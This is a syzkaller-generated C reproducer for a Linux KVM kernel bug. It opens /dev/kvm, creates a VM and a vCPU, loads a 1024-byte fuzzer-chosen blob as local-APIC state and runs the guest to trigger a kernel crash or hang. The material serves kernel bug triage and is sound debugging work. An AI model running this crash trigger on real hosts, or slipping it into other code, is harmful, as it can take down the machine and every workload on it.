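// https://syzkaller.appspot.com/bug?id=83aa676a823eeb2855ab831541b2c8175904c281
// autogenerated by syzkaller (https://github.com/google/syzkaller)
//
// Kernel-crash reproducer for the syzkaller bug linked above.  It drives the
// host kernel's KVM ioctl interface from an unprivileged-looking user-space
// process with a fixed, attacker-chosen 1024-byte payload; its only purpose
// is to trigger the kernel fault under investigation.  Treat it as hostile
// code: run it only inside a disposable VM that exposes /dev/kvm (nested
// virtualization) on the kernel revision named in the bug report, never on a
// machine you care about.  Expect a crash or hang, not a clean exit.
//
// The syscall sequence is kept exactly as syzkaller emitted it: a reproducer
// is only useful if it replays the same calls, in the same order, with the
// same arguments, and continues past failures the way syzkaller does.
//
// Review note: the archived copy of this file had lost the header names from
// every `#include` line (it could not compile).  They are restored below to
// the standard set syzkaller emits for a plain, single-threaded reproducer.
#define _GNU_SOURCE

#include <endian.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <unistd.h>

// Resource table filled in as the program runs:
//   r[0] = /dev/kvm fd, r[1] = VM fd, r[2] = vCPU fd.
// Every slot starts at -1 and is only overwritten by a call that succeeded,
// so a failed step leaves -1 (EBADF) flowing into the next ioctl instead of
// aborting -- this is deliberate syzkaller behaviour, not an oversight.
uint64_t r[3] = {0xffffffffffffffff, 0xffffffffffffffff, 0xffffffffffffffff};

int main(void)
{
  // Fixed address layout that every syzkaller reproducer sets up: a
  // no-access guard page below and above a 16 MiB RWX anonymous region at
  // 0x20000000.  All argument buffers handed to the kernel live in that
  // region, which is why the code below uses absolute addresses.
  // flags 0x32 = MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE.
  syscall(__NR_mmap, /*addr=*/0x1ffff000ul, /*len=*/0x1000ul, /*prot=*/0ul,
          /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/-1,
          /*offset=*/0ul);
  syscall(__NR_mmap, /*addr=*/0x20000000ul, /*len=*/0x1000000ul,
          /*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul,
          /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/-1,
          /*offset=*/0ul);
  syscall(__NR_mmap, /*addr=*/0x21000000ul, /*len=*/0x1000ul, /*prot=*/0ul,
          /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/-1,
          /*offset=*/0ul);

  intptr_t res = 0;

  // Progress marker for the syzkaller harness; the return value is
  // intentionally ignored (the empty `if` keeps -Wunused-result quiet).
  if (write(1, "executing program\n", sizeof("executing program\n") - 1)) {
  }

  // Step 1: open /dev/kvm.  0xffffffffffffff9c is AT_FDCWD (-100) as a
  // 64-bit value; flags/mode 0 = O_RDONLY.  Access to /dev/kvm is the only
  // privilege this reproducer needs.
  memcpy((void*)0x20000000, "/dev/kvm\000", 9);
  res = syscall(__NR_openat, /*fd=*/0xffffffffffffff9cul,
                /*file=*/0x20000000ul, /*flags=*/0, /*mode=*/0);
  if (res != -1)
    r[0] = res;

  // Step 2: create a VM.  Raw ioctl numbers are used because syzkaller does
  // not depend on <linux/kvm.h>; decoded against that header they are:
  //   0xae01     = KVM_CREATE_VM
  //   0xae60     = KVM_CREATE_IRQCHIP   (in-kernel APIC/PIC emulation)
  //   0xae41     = KVM_CREATE_VCPU      (arg = vCPU id, here 5)
  //   0x4400ae8f = KVM_SET_LAPIC        (_IOW, 1024-byte struct)
  //   0xae80     = KVM_RUN
  // NOTE(review): verify these against the target kernel's uapi headers
  // before relying on the names; the numbers are what actually executes.
  res = syscall(__NR_ioctl, /*fd=*/r[0], /*cmd=*/0xae01, /*type=*/0ul);
  if (res != -1)
    r[1] = res;
  syscall(__NR_ioctl, /*fd=*/r[1], /*cmd=*/0xae60, 0);

  // Step 3: create vCPU #5 on that VM.
  res = syscall(__NR_ioctl, /*fd=*/r[1], /*cmd=*/0xae41, /*id=*/5ul);
  if (res != -1)
    r[2] = res;

  // Step 4: the payload.  1024 bytes of fuzzer-chosen data are staged at
  // 0x20000c00 and pushed into the vCPU as a raw local-APIC register image.
  // This is the untrusted input the kernel has to validate; nothing about the
  // bytes is meaningful to a human reader and they must not be "cleaned up".
  memcpy(
      (void*)0x20000c00,
      "\x6c\x94\x93\x85\xc5\x57\x29\x2e\x3b\xae\x74\x43\xd2\x93\x38\x08\x21\xb9"
      "\xa1\x28\xe6\xd4\x4f\x82\xdf\xe0\xfd\x45\xa9\xa7\x50\x57\x49\xe9\x89\x24"
      "\xed\xce\x08\x2b\x3d\x26\x3e\xdc\x44\xd5\x79\x53\xa7\x6d\x8c\x4d\x92\x7d"
      "\xe6\xe7\x39\x20\xb8\x1c\x50\x6c\x83\xaa\x70\x8c\xfd\xe9\xa9\xe1\x15\xae"
      "\x45\x9f\x61\x67\x15\x3c\x81\xea\x66\x9d\x9d\x26\x3d\x52\xe7\xd6\x3e\xab"
      "\xa7\x36\xe0\xcf\x8c\xbc\xec\x87\x1c\x34\x7b\x2e\xd4\xe1\x9c\x3f\xbd\x21"
      "\x7f\x98\xd4\x3d\x93\xd7\xf0\x4b\x31\x34\x56\x44\xc8\xad\x47\xc0\xcd\x44"
      "\x86\xc1\x3a\x4c\x3c\x6a\x0e\x95\x9d\xd4\x77\x51\x46\x5a\x0b\xba\xea\x64"
      "\xe1\x57\xd4\x54\x85\xab\x20\x91\xc0\xad\x8f\xa1\xdd\x05\xe5\x48\x0c\xc8"
      "\x08\x23\xe8\x56\xe4\x52\xe6\xd3\x3b\x69\x11\xc8\xa7\x27\x17\x24\x76\x97"
      "\xb4\x22\x77\x14\xcb\x8b\xac\xcb\x67\x8c\x58\x62\xf9\x4b\x7a\xb1\xf0\x02"
      "\x73\x20\x65\xb0\xd1\x1b\x12\x41\x8a\x99\xa5\x89\x4a\xec\xab\x3e\x2e\x69"
      "\x4e\x2a\x1a\x6d\x97\x84\x64\x7d\x36\x86\x69\x1d\x3f\x56\x92\x06\x37\xad"
      "\x9e\xf4\xce\x90\x58\x68\xeb\x03\xb0\x42\x97\xcb\xac\x05\xef\xd5\x83\xc8"
      "\xd2\xd1\x72\xd4\xa5\x2c\xee\xdc\xaa\xfd\xbb\x4f\xff\x8a\x84\x27\x08\x79"
      "\x5c\xac\x26\x94\x01\x91\x42\xa8\x67\xdd\x5d\x77\x12\xf7\x88\x1a\xd6\x7c"
      "\xc3\xc2\xa6\x5c\xa6\x96\x7e\xc4\x93\x98\x02\x55\x14\xc8\x3c\xe7\x29\x69"
      "\x3b\x78\x7f\xba\x56\x6a\x84\x00\x89\x4f\x56\x25\x0f\x75\xba\x2c\x04\xbe"
      "\x78\x48\x00\x4a\xba\x54\x04\x88\x23\xdd\x17\xfd\xf5\xf5\x68\x73\x36\x5b"
      "\xc0\xdc\x85\xc3\xe0\x6d\x1b\xc8\x5e\xfd\x9a\x00\x41\x4a\xae\xe5\x87\xd0"
      "\x2b\x38\xec\xa4\xce\x0d\xc8\x75\x42\x40\xf2\x59\xc4\x54\x92\x37\xae\x7d"
      "\xd3\x36\x8d\x4e\xbf\x43\x02\x3c\x5e\xde\xb5\x30\x24\x85\x7e\x1e\xee\x70"
      "\xdc\xf4\xae\x2d\x7a\x7e\xfa\xc4\x4f\x62\x55\x5a\xdf\x07\xda\x1e\x6d\x2c"
      "\x28\x19\xdb\x8b\x46\x84\x39\x12\x4a\xd8\xfb\xf1\x38\xdb\x0f\x8e\x13\x2d"
      "\xaa\x6b\x9e\x3a\xdd\xbb\xe5\x80\xa9\xdd\x77\xb7\x7e\x6e\xf5\xd6\xf4\x06"
      "\xbf\x92\xe4\xf8\x07\xe1\x3c\xc9\xb8\x24\x86\xb8\xe5\xe7\x3e\x4f\xcf\xe0"
      "\x0c\x44\x41\xa0\xea\x83\xce\xe3\xc1\x48\x4e\x45\x47\x53\xaa\xdd\x38\x00"
      "\x89\xbe\x4b\xc4\x35\x80\xcf\x60\x0c\xc3\x58\xd8\x1c\x15\x5b\x0d\x38\x1e"
      "\x27\xb4\xe9\x27\x16\x95\x3c\x2b\x59\x42\x82\x15\x51\xd6\xcc\xc1\x0d\x76"
      "\x76\x41\xb4\x03\x78\x46\x32\xc7\xc5\x65\xfa\xa8\x38\x69\x4c\xde\x02\xc7"
      "\x98\xf4\xc9\xab\x04\xaa\x08\x5f\xd4\x9b\x72\x7f\x8d\x08\x4f\x8b\x95\x49"
      "\x22\x0e\x15\x79\x23\xc3\x72\x63\xc3\x37\xd4\x29\xeb\x9a\x10\xe9\x62\x2a"
      "\x72\x02\x7f\xe5\x04\xfb\x86\x36\x6f\xf4\x10\x09\x5f\x89\x9d\x9e\x77\x0b"
      "\x15\x7a\xdb\x95\x73\x9c\x4c\x4c\x7b\x19\x67\x88\x06\x84\x91\x89\x7b\x2d"
      "\xcb\x5f\x8a\xfb\x8a\xf9\x06\xb2\x00\x54\xd0\x7f\xb6\x3c\x29\x28\x1f\xfe"
      "\x67\x67\xb0\x28\x7d\x95\x4c\x1f\x65\x11\x5e\xcc\x65\xdf\x27\xcd\x7f\xd0"
      "\x5d\xec\x5a\x18\x0b\x06\xa1\x67\xb0\x8e\x89\xf1\x5c\x9c\x18\x5d\xa6\x37"
      "\x3b\x3e\xdc\x60\x9f\x1f\xba\x77\x68\xa4\xa5\x65\x10\x9a\xf9\x41\x6f\xef"
      "\x5b\xee\x17\x8f\xb6\x78\xb2\x84\xd7\x20\xe9\x88\x83\xa3\x28\x19\xab\x9c"
      "\x4a\x00\xb4\xc7\x9f\x1a\x68\xb2\x9d\x82\xc0\x66\xfe\xf7\x4f\x53\xab\x88"
      "\xad\xe4\x51\xf1\xc6\x3a\x3d\xd0\x8f\x83\x89\x86\x69\x0c\x7a\x20\x33\x7a"
      "\xba\xdd\x76\xa9\x18\xb8\xf1\x31\xdd\xda\x9e\xab\xac\x2f\x9c\x1b\xa8\x2f"
      "\x88\x59\x91\x4a\x6b\xdb\x65\x12\x85\xb4\xa9\x18\x8b\x61\xfc\x04\x6b\x40"
      "\x60\x1f\xf2\x63\x1e\xfb\xf0\xbd\xbc\x54\x4f\xcf\xda\x36\x38\xc9\xeb\x97"
      "\x4d\xba\x41\xde\xce\x0d\x65\x71\x91\xac\x79\xb6\x67\x6d\xc8\x9d\x19\x1e"
      "\xf9\x14\x08\x22\x8e\x6f\x35\x4e\x96\xb4\x9e\x03\x05\xc0\xa9\xa7\x75\xe7"
      "\x0f\xfa\xc6\x58\x95\x7e\x96\x62\x1a\x04\x69\xfa\xe4\x72\x1e\xb9\x2b\x68"
      "\x52\x4e\x2e\x22\x45\x16\xb1\xb0\x00\x75\x0b\xf2\xbd\xe2\xda\xd2\x5d\x43"
      "\xcb\x65\xe7\xc0\x77\x97\xe5\x72\x26\xd1\x74\x83\x93\xc3\x35\x2d\x18\x93"
      "\x1a\xbd\xd5\x33\x3d\xe7\x73\x9c\xf1\x8f\xcc\xd7\xd1\x94\x42\x5c\x98\xd0"
      "\xbe\x9d\xc3\xfb\xff\xb2\x7e\x92\x5d\x89\x06\x8e\x7b\x9a\x44\xe4\x9a\x7e"
      "\x37\x03\xd0\xe6\x3c\xb0\x3d\x1b\x7c\x5b\x93\xb4\x4d\x02\x39\x5c\xe7\xd2"
      "\xb2\xaa\xc0\x5f\x1b\xf3\x5d\x94\x15\x22\xeb\x9e\xff\x65\x41\x96\x5d\xda"
      "\xae\x8b\xb8\xba\xeb\xb1\x90\xf8\xc2\x61\x69\x5f\xf0\x15\xc1\x70\x48\xf6"
      "\x26\x74\x11\x8d\x40\xa7\x21\x64\x6e\xfb\xe9\x4b\xff\x93\x9d\x8b\x45\x0f"
      "\x96\xad\xc5\x0c\xc3\x07\x21\xeb\xc0\xbc\xef\x7d\xf3\x66\x7b\x18\x39\xf5"
      "\x9f\x2e\x3e\x09\x40\xcb\x04\xf7\xc0\xcb\x50\x4b\x06\xc7\xc5\x88",
      1024);
  syscall(__NR_ioctl, /*fd=*/r[2], /*cmd=*/0x4400ae8f, /*arg=*/0x20000c00ul);

  // Step 5: enter the guest with that APIC state.  On an affected kernel this
  // is where the fault is expected to surface.  No fds are closed on purpose:
  // the process exiting (or the kernel dying) is the intended teardown.
  syscall(__NR_ioctl, /*fd=*/r[2], /*cmd=*/0xae80, /*arg=*/0ul);
  return 0;
}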